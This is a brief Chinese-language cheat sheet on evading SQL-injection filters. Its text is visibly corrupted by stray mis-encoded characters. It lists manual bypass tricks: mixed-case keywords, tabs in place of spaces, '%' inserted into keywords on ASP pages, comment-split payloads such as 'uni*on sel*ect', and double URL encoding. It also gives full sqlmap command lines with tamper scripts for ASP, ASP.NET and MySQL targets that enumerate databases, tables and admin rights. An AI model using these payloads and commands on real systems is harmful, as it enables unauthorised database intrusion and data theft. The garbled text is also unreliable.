繞過(guò)防注入分為工具和手工
? 大小寫 SQL 關(guān)鍵字费坊,例如 SeLeCt伐脖。?
? Tab 制表符替換空格。?
? ASP 頁(yè)面可以在 SQL 關(guān)鍵字中插入%號(hào)殖氏,而且可以無(wú)限多個(gè),例如 Sel%ect 或者 Sel%%%%%%ect
?? 將被替換為空格的字符*插入在 SQL 語(yǔ)句中例如 id=1+uni*on+sel*ect+1,2,3—
?? 多重編碼姻采,例如單引號(hào)’第一次編碼為%27雅采,第二次編碼為%2527
? ASP
sqlmap.py -v3 --level=3 --risk=3 --dbs --tables --is-dba -b --threads=10 --batch
--tamper "percentage.py" --hex -u "
? ASP/ASP.NET
--tamper "charunicodeencode.py"
? MySQL
sqlmap.py -v3 --level=3 --risk=3 --current-db --dbms=mysql --tables --is-dba -b
--threads=10 --batch --tamper "space2hash.py" --hex -u ""
sqlmap.py -v3 --level=3 --risk=3 --dbms=mysql --tables --is-dba -b --threads=10
--batch --tamper "space2hash.py" --hex -u ""
--tamper "space2hash.py" MySQL 4.0,5.0
空格替換為#號(hào) 隨機(jī)字符串 以及換行符
用/**/分割SQL關(guān)鍵字
randomcomments.py
unmagicquotes.py
--tamper "space2morehash.py"? MySQL 5.1.13 - 5.1.41
--tamper "space2mysqlblank.py"
